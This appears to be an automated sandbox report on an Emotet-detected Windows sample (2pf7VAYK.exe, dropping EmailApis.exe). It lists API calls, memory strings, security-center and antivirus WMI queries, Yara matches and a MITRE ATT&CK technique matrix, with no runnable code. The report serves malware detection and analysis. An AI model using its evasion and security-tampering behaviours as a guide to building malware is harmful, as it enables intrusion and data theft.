                Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose, | 1_2_02183810
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00407513 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, | 0_2_00407513
                Source: svchost.exe, 00000006.00000002.442604585.000001CF19461000.00000004.00000001.sdmp | Binary or memory string: "@Hyper-V RAWGlobal\BFE_Notify_Event_{6c879189-1c04-4de8-b836-558b3f4
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000006.00000002.441267653.000001CF13C2A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW-F
                Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.442587509.000001CF19454000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000008.00000002.441134023.000001B8E2829000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000004.00000002.259893485.0000018A2AB40000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.300949450.000001EDBD540000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_0040BD50 LoadLibraryW,GetProcAddress, | 0_2_0040BD50
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02184E20 mov eax, dword ptr fs:[00000030h] | 1_2_02184E20
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02183EE0 mov eax, dword ptr fs:[00000030h] | 1_2_02183EE0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02050456 mov eax, dword ptr fs:[00000030h] | 1_2_02050456
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02055A7E mov eax, dword ptr fs:[00000030h] | 1_2_02055A7E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0205095E mov eax, dword ptr fs:[00000030h] | 1_2_0205095E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_020569BE mov eax, dword ptr fs:[00000030h] | 1_2_020569BE
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02161030 mov eax, dword ptr fs:[00000030h] | 1_2_02161030
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_02182210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash, | 1_2_02182210
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_0040568A SetUnhandledExceptionFilter, | 0_2_0040568A
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_0040569E SetUnhandledExceptionFilter, | 0_2_0040569E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0040568A SetUnhandledExceptionFilter, | 1_2_0040568A
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: 1_2_0040569E SetUnhandledExceptionFilter, | 1_2_0040569E
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmp | Binary or memory string: Program Manager
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmp | Binary or memory string: Progman
                Source: EmailApis.exe, 00000001.00000002.441563979.0000000000C40000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: GetLocaleInfoA, | 0_2_00407307
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Code function: GetLocaleInfoA, | 1_2_00407307
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00404E55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, | 0_2_00404E55
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Code function: 0_2_00402168 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA, | 0_2_00402168
                Source: C:\Users\user\Desktop\2pf7VAYK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings:

                Changes security center settings (notifications, updates, antivirus, firewall)
                Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                Source: svchost.exe, 0000000C.00000002.441352229.000002CB28E3D000.00000004.00000001.sdmp | Binary or memory string: &@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                Source: svchost.exe, 0000000C.00000002.441409317.000002CB28F02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                Stealing of Sensitive Information:

                Yara detected Emotet
                Source: Yara match | File source: 00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.441653243.0000000002050000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.2pf7VAYK.exe.700000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.EmailApis.exe.2180000.1.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation1 | Path Interception | Process Injection2 | Masquerading121 | Input Capture1 | System Time Discovery1 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
                Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery51 | Remote Desktop Protocol | Archive Collected Data11 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Virtualization/Sandbox Evasion3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | Process Discovery3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol11 | SIM Card Swap | Carrier Billing Fraud |
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | File and Directory Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion1 | DCSync | System Information Discovery36 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

                Behavior Graph

                Behavior Graph ID: 289509